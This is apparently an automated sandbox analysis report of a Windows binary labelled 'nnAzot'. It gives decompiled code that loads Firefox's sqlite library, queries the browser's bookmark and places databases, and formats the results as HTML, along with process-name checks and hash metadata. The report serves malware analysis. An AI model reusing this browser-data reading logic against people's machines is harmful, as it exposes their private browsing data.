            0x003a252b
            0x003a2397
            0x003a23ae
            0x003a23c4
            0x003a23c6
            0x003a23cd
            0x00000000
            0x00000000
            0x00000000

            APIs
              • Part of subcall function 003A2225: _vsnwprintf.MSVCRT ref: 003A2257
            • LoadLibraryExW.KERNELBASE(?,00000000,00000000), ref: 003A2377
            • LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 003A238C
            • LoadLibraryExW.KERNELBASE(?,00000000,00001100), ref: 003A23C4
            • GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 003A23DF
            • GetProcAddress.KERNEL32(sqlite3_open_v2), ref: 003A23F1
            • GetProcAddress.KERNEL32(sqlite3_open16), ref: 003A2403
            • GetProcAddress.KERNEL32(sqlite3_exec), ref: 003A2415
            • GetProcAddress.KERNEL32(sqlite3_free), ref: 003A2427
            • GetProcAddress.KERNEL32(sqlite3_close), ref: 003A243A
            • GetProcAddress.KERNEL32(sqlite3_prepare_v2), ref: 003A244C
            • GetProcAddress.KERNEL32(sqlite3_prepare16_v2), ref: 003A245E
            • GetProcAddress.KERNEL32(sqlite3_column_count), ref: 003A2470
            • GetProcAddress.KERNEL32(sqlite3_column_int), ref: 003A2482
            • GetProcAddress.KERNEL32(sqlite3_column_int64), ref: 003A2494
            • GetProcAddress.KERNEL32(sqlite3_column_text), ref: 003A24A6
            • GetProcAddress.KERNEL32(sqlite3_column_text16), ref: 003A24B8
            • GetProcAddress.KERNEL32(sqlite3_step), ref: 003A24CA
            • GetProcAddress.KERNEL32(sqlite3_reset), ref: 003A24DC
            • GetProcAddress.KERNEL32(sqlite3_finalize), ref: 003A24EE
            • GetProcAddress.KERNEL32(sqlite3_close), ref: 003A24FC
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: AddressProc$LibraryLoad$_vsnwprintf
            • String ID: %s\%s$mozcrt19.dll$mozsqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_count$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_free$sqlite3_open$sqlite3_open16$sqlite3_open_v2$sqlite3_prepare16_v2$sqlite3_prepare_v2$sqlite3_reset$sqlite3_step
            • API String ID: 2176504369-1379368381
            • Opcode ID: 4adf3703445954c9f6a47620c6ed6ee8caaf31918b66e400061f797be035a971
            • Instruction ID: c07cf6f172aa48d57a5590980aed75f65b613399ee5d08c5c5a73691fd13daf1
            • Opcode Fuzzy Hash: 4adf3703445954c9f6a47620c6ed6ee8caaf31918b66e400061f797be035a971
            • Instruction Fuzzy Hash: 34511DB5E40318AFCB239F72AC4BE863FACE71B790F080426F514932A1D6759490CF61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 73 3a4bba-3a4bc7 SetUnhandledExceptionFilter
            C-Code - Quality: 100%
            			E003A4BBA() {
            
            				SetUnhandledExceptionFilter(E003A4B72); // executed
            				return 0;
            			}



            0x003a4bbf
            0x003a4bc7

            APIs
            • SetUnhandledExceptionFilter.KERNEL32 ref: 003A4BBF
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 5d39a938392c59ac4060243a1ef08ff2bdca4372fa343a205520d55e9a070ec7
            • Instruction ID: 715fc98708ad759f542535201374ad956433efb4360264c25c5b753d9ae8ee5a
            • Opcode Fuzzy Hash: 5d39a938392c59ac4060243a1ef08ff2bdca4372fa343a205520d55e9a070ec7
            • Instruction Fuzzy Hash: 359002A02D61004646065B715E4968527989A9B746B414494B281C4554DB9480045521
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 13 3a490b-3a4925 call 3a4ec4 16 3a4927-3a4936 13->16 17 3a4938-3a493a 16->17 18 3a4950-3a4952 16->18 19 3a493c-3a4941 17->19 20 3a4943-3a494e Sleep 17->20 21 3a4953-3a4959 18->21 19->21 20->16 22 3a495b-3a4963 _amsg_exit 21->22 23 3a4965-3a496b 21->23 24 3a499f-3a49a5 22->24 25 3a4999 23->25 26 3a496d-3a497d call 3a4a75 23->26 27 3a49c2-3a49c4 24->27 28 3a49a7-3a49b8 _initterm 24->28 25->24 32 3a4982-3a4986 26->32 30 3a49cf-3a49d6 27->30 31 3a49c6-3a49cd 27->31 28->27 33 3a49d8-3a49e5 call 3a4cf0 30->33 34 3a49f1-3a4a17 call 3a31c6 30->34 31->30 32->24 35 3a4988-3a4994 32->35 33->34 43 3a49e7-3a49ea 33->43 44 3a4a19-3a4a33 exit _XcptFilter 34->44 45 3a4a4f-3a4a56 34->45 38 3a4a6a-3a4a6f call 3a4f09 35->38 43->34 44->45 46 3a4a58-3a4a5e _cexit 45->46 47 3a4a63 45->47 46->47 47->38
            C-Code - Quality: 50%
            			E003A490B() {
            				int _t11;
            				intOrPtr _t14;
            				intOrPtr _t19;
            				void* _t20;
            				intOrPtr* _t23;
            				void* _t34;
            				intOrPtr _t35;
            				void* _t36;
            				intOrPtr _t37;
            				intOrPtr _t39;
            				void* _t41;
            				void* _t54;
            
            				_push(0xc);
            				_push(0x3a5100);
            				E003A4EC4(_t20, _t34, _t36);
            				 *((intOrPtr*)(_t41 - 4)) = 0;
            				_t37 =  *((intOrPtr*)( *[fs:0x18] + 4));
            				_t35 = 0;
            				while(1) {
            					asm("lock cmpxchg [edx], ecx");
            					if(0 == 0) {
            						break;
            					}
            					if(0 != _t37) {
            						Sleep(0x3e8);
            						continue;
            					} else {
            						_t39 = 1;
            						_t35 = 1;
            					}
            					L6:
            					if( *0x3a66b0 != _t39) {
            						__eflags =  *0x3a66b0;
            						if(__eflags != 0) {
            							 *0x3a6044 = _t39;
            							goto L12;
            						} else {
            							 *0x3a66b0 = _t39;
            							_t19 = E003A4A75(0x3a1014, 0x3a1020); // executed
            							__eflags = _t19;
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								 *((intOrPtr*)(_t41 - 4)) = 0xfffffffe;
            								_t11 = 0xff;
            								goto L24;
            							}
            						}
            					} else {
            						_push(0x1f);
            						L003A4C84();
            						L12:
            						if( *0x3a66b0 == _t39) {
            							_push(0x3a1010);
            							_push(0x3a1004);
            							L003A4EB8();
            							 *0x3a66b0 = 2;
            						}
            						if(_t35 == 0) {
            							 *0x3a66ac = 0;
            						}
            						_t51 =  *0x3a66bc;
            						if( *0x3a66bc != 0 && E003A4CF0(_t51, 0x3a66bc) != 0) {
            							 *0x3a66bc(0, 2, 0);
            						}
            						_push( *0x3a6050);
            						_t11 = E003A31C6(_t54,  *0x3a6048,  *0x3a604c); // executed
            						 *0x3a6040 = _t11;
            						if( *0x3a6058 != 0) {
            							__eflags =  *0x3a6044;
            							if( *0x3a6044 == 0) {
            								__imp___cexit();
            								_t11 =  *0x3a6040;
            							}
            							 *((intOrPtr*)(_t41 - 4)) = 0xfffffffe;
            							L24:
            							return E003A4F09(_t11);
            						} else {
            							exit(_t11); // executed
            							_t23 =  *((intOrPtr*)(_t41 - 0x14));
            							_t14 =  *((intOrPtr*)( *_t23));
            							 *((intOrPtr*)(_t41 - 0x1c)) = _t14;
            							_push(_t23);
            							_push(_t14);
            							L003A4BCE();
            							return _t14;
            						}
            					}
            				}
            				_t39 = 1;
            				__eflags = 1;
            				goto L6;
            			}















            0x003a490b
            0x003a490d
            0x003a4912
            0x003a4919
            0x003a4922
            0x003a4925
            0x003a4927
            0x003a4930
            0x003a4936
            0x00000000
            0x00000000
            0x003a493a
            0x003a4948
            0x00000000
            0x003a493c
            0x003a493e
            0x003a493f
            0x003a493f
            0x003a4953
            0x003a4959
            0x003a4965
            0x003a496b
            0x003a4999
            0x00000000
            0x003a496d
            0x003a496d
            0x003a497d
            0x003a4984
            0x003a4986
            0x00000000
            0x003a4988
            0x003a4988
            0x003a498f
            0x00000000
            0x003a498f
            0x003a4986
            0x003a495b
            0x003a495b
            0x003a495d
            0x003a499f
            0x003a49a5
            0x003a49a7
            0x003a49ac
            0x003a49b1
            0x003a49b8
            0x003a49b8
            0x003a49c4
            0x003a49cd
            0x003a49cd
            0x003a49cf
            0x003a49d6
            0x003a49eb
            0x003a49eb
            0x003a49f1
            0x003a4a03
            0x003a4a0b
            0x003a4a17
            0x003a4a4f
            0x003a4a56
            0x003a4a58
            0x003a4a5e
            0x003a4a5e
            0x003a4a63
            0x003a4a6a
            0x003a4a6f
            0x003a4a19
            0x003a4a1a
            0x003a4a20
            0x003a4a25
            0x003a4a27
            0x003a4a2a
            0x003a4a2b
            0x003a4a2c
            0x003a4a33
            0x003a4a33
            0x003a4a17
            0x003a4959
            0x003a4952
            0x003a4952
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: CurrentFilterImageNonwritableSleepXcpt__initterm_e_amsg_exit_inittermexit
            • String ID:
            • API String ID: 3102234582-0
            • Opcode ID: fa259fa69ad429ab4459a30e1250dbdcb51d7c103ca10c39790072549a628acd
            • Instruction ID: 7c9657a06dfb9a04b997d47707ef52dd45d5aa9b8a313b7bf55cca110b1d454f
            • Opcode Fuzzy Hash: fa259fa69ad429ab4459a30e1250dbdcb51d7c103ca10c39790072549a628acd
            • Instruction Fuzzy Hash: 9D319E71688351DFDB23DF64AC4A72B77A8F787720F25412DE5129A2E1DBB48890CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 48 3a31c6-3a31ec call 3a47e2 51 3a3249-3a324d 48->51 52 3a31ee-3a31f5 48->52 54 3a3253-3a326e SHAnsiToUnicode 51->54 55 3a32d4-3a32e5 call 3a4aad 51->55 52->51 53 3a31f7-3a31fe 52->53 53->51 56 3a3200-3a3217 rand_s 53->56 58 3a32d3 54->58 59 3a3270-3a327f SHAnsiToUnicode 54->59 56->51 60 3a3219-3a322a 56->60 58->55 59->58 62 3a3281-3a3290 SHAnsiToUnicode 59->62 60->51 63 3a322c-3a3247 VirtualAlloc 60->63 62->58 64 3a3292-3a3299 call 3a230e 62->64 63->51 63->63 66 3a329e-3a32a0 64->66 66->58 67 3a32a2-3a32a9 66->67 67->58 68 3a32ab-3a32b2 67->68 68->58 69 3a32b4-3a32c6 68->69 69->58 71 3a32c8-3a32ce call 3a3047 69->71 71->58
            APIs
              • Part of subcall function 003A47E2: GetVersionExA.KERNEL32(003A63A8,003A31E5), ref: 003A47FA
            • rand_s.MSVCRT ref: 003A320E
            • VirtualAlloc.KERNELBASE(00000000,00010000,00002000,00000001), ref: 003A323A
            • SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 003A326A
            • SHAnsiToUnicode.SHLWAPI(00000004,?,00000104), ref: 003A327B
            • SHAnsiToUnicode.SHLWAPI(?,?,00000104), ref: 003A328C
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: AnsiUnicode$AllocVersionVirtualrand_s
            • String ID:
            • API String ID: 2672016816-0
            • Opcode ID: 4373fa936fda230a67604c6574d97528886220195a72b1d7b5e3182ac7eb8733
            • Instruction ID: fd85ff5acac45c12e7320db1a4545ac7f8013c7e03f959babf410be459c13c2a
            • Opcode Fuzzy Hash: 4373fa936fda230a67604c6574d97528886220195a72b1d7b5e3182ac7eb8733
            • Instruction Fuzzy Hash: AD31A071A002089AEF32DB65DC45BBA73ADEB87750F1545A9F505D6090EB31EE81CB20
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 416 3a4df8-3a4e1b 417 3a4e2a-3a4e77 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 416->417 418 3a4e1d-3a4e1f 416->418 420 3a4e79-3a4e7f 417->420 421 3a4e81 417->421 418->417 419 3a4e21-3a4e28 418->419 422 3a4e94-3a4e99 419->422 420->421 423 3a4e86-3a4e8e 420->423 421->423 423->422
            C-Code - Quality: 100%
            			E003A4DF8() {
            				void* _v8;
            				struct _FILETIME _v16;
            				signed int _v20;
            				union _LARGE_INTEGER _v24;
            				signed int _t23;
            				signed int _t35;
            				signed int _t36;
            				signed int _t39;
            
            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
            				_t23 =  *0x3a6004;
            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
            					GetSystemTimeAsFileTime( &_v16);
            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
            					_v8 = _v8 ^ GetCurrentProcessId();
            					_v8 = _v8 ^ GetCurrentThreadId();
            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
            					QueryPerformanceCounter( &_v24);
            					_t35 = _v20 ^ _v24.LowPart;
            					_t39 = _v8 ^ _t35;
            					if(_t39 == 0xbb40e64e || ( *0x3a6004 & 0xffff0000) == 0) {
            						_t39 = 0xbb40e64f;
            					}
            					 *0x3a6004 = _t39;
            					 *0x3a6008 =  !_t39;
            					return _t35;
            				} else {
            					_t36 =  !_t23;
            					 *0x3a6008 = _t36;
            					return _t36;
            				}
            			}











            0x003a4e00
            0x003a4e04
            0x003a4e08
            0x003a4e1b
            0x003a4e2e
            0x003a4e3a
            0x003a4e43
            0x003a4e4c
            0x003a4e5d
            0x003a4e64
            0x003a4e6d
            0x003a4e73
            0x003a4e77
            0x003a4e81
            0x003a4e81
            0x003a4e86
            0x003a4e8e
            0x00000000
            0x003a4e21
            0x003a4e21
            0x003a4e23
            0x00000000
            0x003a4e23

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003A4E2E
            • GetCurrentProcessId.KERNEL32 ref: 003A4E3D
            • GetCurrentThreadId.KERNEL32 ref: 003A4E46
            • GetTickCount.KERNEL32 ref: 003A4E4F
            • QueryPerformanceCounter.KERNEL32(?), ref: 003A4E64
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
            • String ID:
            • API String ID: 1445889803-0
            • Opcode ID: 24376b330bf1c9fd17fea76a23a1e2dbe4fff3cd2c5998003a3d23a2e5bdb135
            • Instruction ID: 56fc0ea2584aa334d5b131974ee310cfafe25db88aacefe09704aae24b516467
            • Opcode Fuzzy Hash: 24376b330bf1c9fd17fea76a23a1e2dbe4fff3cd2c5998003a3d23a2e5bdb135
            • Instruction Fuzzy Hash: E011BF71D08208DBCF12CFB4DA8899EB7F8FF49301F66445AE402D3250EB709A00CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E003A4F4C(struct _EXCEPTION_POINTERS* _a4) {
            
            				SetUnhandledExceptionFilter(0);
            				UnhandledExceptionFilter(_a4);
            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
            			}



            0x003a4f53
            0x003a4f5c
            0x003a4f75

            APIs
            • SetUnhandledExceptionFilter.KERNEL32 ref: 003A4F53
            • UnhandledExceptionFilter.KERNEL32(003A5087), ref: 003A4F5C
            • GetCurrentProcess.KERNEL32(C0000409,?,003A5087,p`:), ref: 003A4F67
            • TerminateProcess.KERNEL32(00000000,?,003A5087,p`:), ref: 003A4F6E
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
            • String ID:
            • API String ID: 3231755760-0
            • Opcode ID: 16e8c77ea91bb47ee58d1f2da415eee271815dc824309605b856fc596e5292fd
            • Instruction ID: 9a0b6a6ae5763074f8d6a62560a4b80bf733d1fcde5f385f513d2cec066bb8f9
            • Opcode Fuzzy Hash: 16e8c77ea91bb47ee58d1f2da415eee271815dc824309605b856fc596e5292fd
            • Instruction Fuzzy Hash: D6D01272048904BBD7026BF1FD4CAD93F2CFB47352F044040F30D82060CB3244018B51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E003A47E2() {
            				void* _t1;
            				int _t2;
            
            				if( *0x3a63a4 == 0) {
            					0x3a63a8->dwOSVersionInfoSize = 0x9c;
            					_t2 = GetVersionExA(0x3a63a8);
            					 *0x3a63a4 = 1;
            					return _t2;
            				}
            				return _t1;
            			}





            0x003a47e9
            0x003a47f0
            0x003a47fa
            0x003a4800
            0x00000000
            0x003a4800
            0x003a4807

            APIs
            • GetVersionExA.KERNEL32(003A63A8,003A31E5), ref: 003A47FA
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: Version
            • String ID:
            • API String ID: 1889659487-0
            • Opcode ID: c8a5693e65da8c1a16e19314e6abc6fe1bae89e2283ff602549f71c73b033c9b
            • Instruction ID: eae6ec4a4b99033f73941476c0dc5065e7b2698ed86d17fee4244582681a4689
            • Opcode Fuzzy Hash: c8a5693e65da8c1a16e19314e6abc6fe1bae89e2283ff602549f71c73b033c9b
            • Instruction Fuzzy Hash: B2C04C6C4163C0ADEF138720ED5A7593E58A7B3705F9C008CD040151F2C2FB0046A711
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 74 3a389c-3a38ba 75 3a38c0-3a38d6 GetModuleFileNameW 74->75 76 3a3a06-3a3a15 call 3a4aad 74->76 77 3a39fe 75->77 78 3a38dc-3a38fb PathFindFileNameW StrCmpICW 75->78 80 3a3a01 77->80 81 3a38fd-3a38fe 78->81 82 3a3903-3a390d StrCmpICW 78->82 80->76 81->80 84 3a390f 82->84 85 3a3917-3a3921 StrCmpICW 82->85 86 3a3911-3a3912 84->86 87 3a3923-3a3925 85->87 88 3a3927-3a3931 StrCmpICW 85->88 86->80 87->86 89 3a3933-3a3935 88->89 90 3a3937-3a3941 StrCmpICW 88->90 89->86 91 3a3943-3a3945 90->91 92 3a3947-3a3951 StrCmpICW 90->92 91->86 93 3a3953-3a3955 92->93 94 3a3957-3a3961 StrCmpICW 92->94 93->86 95 3a3963-3a3965 94->95 96 3a3967-3a3971 StrCmpICW 94->96 95->86 96->95 97 3a3973-3a397d StrCmpICW 96->97 97->95 98 3a397f-3a3989 StrCmpICW 97->98 98->95 99 3a398b-3a3995 StrCmpICW 98->99 100 3a399e-3a39a8 StrCmpICW 99->100 101 3a3997-3a3999 99->101 102 3a39aa-3a39ac 100->102 103 3a39b1-3a39bb StrCmpICW 100->103 101->86 102->86 104 3a39bd-3a39bf 103->104 105 3a39c4-3a39ce StrCmpICW 103->105 104->86 106 3a39d0-3a39d2 105->106 107 3a39d7-3a39e1 StrCmpICW 105->107 106->86 108 3a39ea-3a39fc StrCmpICW 107->108 109 3a39e3-3a39e5 107->109 108->80 109->86
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,750A4D40,00000000), ref: 003A38CE
            • PathFindFileNameW.SHLWAPI(?), ref: 003A38E3
            • StrCmpICW.SHLWAPI(00000000,IEXPLORE.EXE), ref: 003A38F7
            • StrCmpICW.SHLWAPI(00000000,MSFEEDSSYNC.EXE), ref: 003A3909
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.2097581101.00000000003A1000.00000020.00020000.sdmp, Offset: 003A0000, based on PE: true
            • Associated: 00000005.00000002.2097573877.00000000003A0000.00000002.00020000.sdmp Download File
            • Associated: 00000005.00000002.2097593958.00000000003A7000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_5_2_3a0000_nnAzot.jbxd
            Similarity
            • API ID: FileName$FindModulePath
            • String ID: EXPLORER.EXE$FAKEVIRTUALSURFACETESTAPP.EXE$FirstLogonAnim.exe$IEUTLAUNCH.EXE$IEXPLORE.EXE$LOADER42.EXE$MSFEEDSSYNC.EXE$MSHTMPAD.EXE$MSOOBE.EXE$NETPLWIZ.EXE$RESTOREOPTIN.EXE$SYSPREP.EXE$TE.EXE$Te.ProcessHost.exe$USERACCOUNTBROKER.EXE$WWAHOST.EXE
            • API String ID: 1618668439-1412893414
            • Opcode ID: 9557391bca42673bd201c8ba6bdc1827a570c53bfa033287f9bf0e42cc081e8e
            • Instruction ID: 5f8cd9306b3373353c40e3c552cf015dab0755e0928041582961a789c51df9c8
            • Opcode Fuzzy Hash: 9557391bca42673bd201c8ba6bdc1827a570c53bfa033287f9bf0e42cc081e8e
            • Instruction Fuzzy Hash: 3831606638976A75EA23A6394C42FFB228CCF53F84F120319F915F10D5EBD9CB0245A6
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 110 3a2d9c-3a2dd5 call 3a50c0 call 3a295f 115 3a2ddb-3a2e0a call 3a2225 call 3a2b5d 110->115 116 3a2f45-3a2f58 call 3a295f 110->116 115->116 128 3a2e10-3a2e36 call 3a28d3 115->128 122 3a2f5e-3a2f8d call 3a2225 call 3a2b5d 116->122 123 3a3015-3a3041 call 3a27b8 * 2 call 3a4aad 116->123 122->123 137 3a2f93-3a2fa5 122->137 138 3a2f3a-3a2f40 call 3a2beb 128->138 139 3a2e3c 128->139 142 3a2ff4-3a3008 call 3a2809 137->142 138->116 140 3a2e42-3a2e4b 139->140 144 3a2e6d-3a2e77 lstrcmpW 140->144 145 3a2e4d-3a2e57 lstrcmpW 140->145 153 3a300a-3a3010 call 3a2beb 142->153 154 3a2fa7-3a2fe7 142->154 147 3a2f1e-3a2f32 call 3a28d3 144->147 149 3a2e7d-3a2e9f call 3a2a22 144->149 145->147 148 3a2e5d-3a2e67 lstrcmpW 145->148 147->140 162 3a2f38 147->162 148->144 148->147 160 3a2ea1-3a2eb2 149->160 161 3a2ee7-3a2f05 149->161 153->123 155 3a2fec call 3a2cd4 154->155 159 3a2ff1 155->159 159->142 164 3a2eb7 call 3a2cd4 160->164 163 3a2f0a call 3a2cd4 161->163 162->138 165 3a2f0f 163->165 166 3a2ebc 164->166 167 3a2f12-3a2f14 165->167 168 3a2ec1 call 3a2cd4 166->168 167->147 169 3a2f16-3a2f1d ??3@YAXPAX@Z 167->169 170 3a2ec6-3a2ed4 call 3a2d9c 168->170 169->147 173 3a2ed9 call 3a2cd4 170->173 174 3a2ede-3a2ee5 173->174 174->167
            C-Code - Quality: 73%
            			E003A2D9C(char* __ecx, void* __edx, long long __fp0) {
            				signed int _v8;
            				char _v32;
            				char _v2060;
            				char _v4108;
            				long long _v4112;
            				signed int _v4116;
            				WCHAR* _v4120;
            				char _v4124;
            				intOrPtr _v4128;
            				char _v4132;
            				intOrPtr _v4140;
            				intOrPtr _v4144;
            				intOrPtr _v4148;
            				char _v4172;
            				WCHAR* _v4180;
            				WCHAR* _v4184;
            				WCHAR* _v4188;
            				char _v4212;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t57;
            				void* _t63;
            				void* _t65;
            				void* _t72;
            				void* _t82;
            				char* _t89;
            				void* _t90;
            				char* _t98;
            				void* _t104;
            				void* _t105;
            				WCHAR* _t107;
            				void* _t108;
            				WCHAR* _t109;
            				signed int _t110;
            				signed int _t111;
            				long long* _t112;
            				void* _t113;
            				long long* _t114;
            				long long _t130;
            				long long _t131;
            
            				_t130 = __fp0;
            				_t102 = __edx;
            				_t91 = __ecx;
            				E003A50C0(0x1074);
            				_v8 =  *0x3a6004 ^ _t111;
            				 *0x3a638c =  *0x3a638c + 1;
            				_t107 = 0;
            				_t89 = __ecx;
            				_v4124 = 0;
            				_v4120 = 0;
            				if(E003A295F() == 0) {
            					L16:
            					_v4132 = _t107;
            					_v4128 = _t107;
            					if(E003A295F() == 0) {
            						L22:
            						 *0x3a638c =  *0x3a638c - 1;
            						E003A27B8( &_v4132, _t128);
            						_t57 = E003A27B8( &_v4124, _t128);
            						_pop(_t104);
            						_pop(_t108);
            						_pop(_t90);
            						return E003A4AAD(_t57, _t90, _v8 ^ _t111, _t102, _t104, _t108);
            					}
            					E003A2225( &_v4108, 0x400, L"select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favicons as i on p.favicon_id=i.id where b.fk=p.id and b.parent=%d", _t89);
            					_t113 = _t112 + 0x10;
            					_t63 = E003A2B5D(_t91,  &_v4108,  &_v4132);
            					_t127 = _t63;
            					if(_t63 < 0) {
            						goto L22;
            					}
            					_v4148 = _t107;
            					_v4144 = _t107;
            					_v4140 = _t107;
            					while(1) {
            						_t65 = E003A2809( &_v4132, _t102, _t127,  &_v4172);
            						_t128 = _t65;
            						if(_t65 < 0) {
            							break;
            						}
            						_push(_v4148);
            						asm("fild qword [ebp-0x1038]");
            						_push(_v4140);
            						_v4112 = _t130;
            						_t131 = _v4112;
            						_t114 = _t113 - 0x10;
            						_v32 = _t131;
            						asm("fild qword [ebp-0x1040]");
            						_v4112 = _t131;
            						_t130 = _v4112;
            						 *_t114 = _t130;
            						E003A2CD4(L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" LAST_MODIFIED=\"%.0f\" ICON_URI=\"%s\">%s</A>", _v4144);
            						_t113 = _t114 + 0x20;
            					}
            					E003A2BEB( &_v4172);
            					goto L22;
            				}
            				E003A2225( &_v2060, 0x400, L"select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d", __ecx);
            				_t112 = _t112 + 0x10;
            				_t72 = E003A2B5D(_t91,  &_v2060,  &_v4124);
            				_t116 = _t72;
            				if(_t72 < 0) {
            					goto L16;
            				}
            				_v4188 = 0;
            				_t98 =  &_v4124;
            				_v4184 = 0;
            				_v4180 = 0;
            				if(E003A28D3(_t98, __edx, _t116,  &_v4212) < 0) {
            					L15:
            					_t91 =  &_v4212;
            					E003A2BEB( &_v4212);
            					goto L16;
            				} else {
            					_t105 = lstrcmpW;
            					do {
            						_t109 = _v4188;
            						if(_t89 != 1 || lstrcmpW(_t109, L"Tags") != 0 && lstrcmpW(_t109, 0x3a1744) != 0) {
            							if(lstrcmpW(_t109, L"Smart Bookmarks") != 0) {
            								_v4116 = _v4116 & 0x00000000;
            								_t82 = E003A2A22(_t98, _t105, _v4212,  &_v4116);
            								asm("fild qword [ebp-0x1068]");
            								_push(_t109);
            								if(_t82 != 0) {
            									_push(_v4116);
            									_v4112 = _t130;
            									_t130 = _v4112;
            									_t110 = _v4116;
            									_push(_t98);
            									_push(_t98);
            									_v32 = _t130;
            									E003A2CD4(L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" FEEDURL=\"%s\">%s</A>", _t110);
            									_t112 = _t112 + 0x18;
            								} else {
            									_v4112 = _t130;
            									_t130 = _v4112;
            									 *_t112 = _t130;
            									E003A2CD4(L"<DT><H3 FOLDED ADD_DATE=\"%.0f\">%s</H3>", _t98);
            									E003A2CD4(L"<DL><p>", _t98);
            									_t112 = _t112 + 0x14;
            									E003A2D9C(_v4212, _t102, _t130);
            									_push(L"</DL><p>");
            									E003A2CD4();
            									_t110 = _v4116;
            								}
            								_t123 = _t110;
            								if(_t110 != 0) {
            									__imp__??3@YAXPAX@Z(_t110);
            								}
            							}
            						}
            						_t98 =  &_v4124;
            					} while (E003A28D3(_t98, _t102, _t123,  &_v4212) >= 0);
            					_t107 = 0;
            					goto L15;
            				}
            			}












































            0x003a2d9c
            0x003a2d9c
            0x003a2d9c
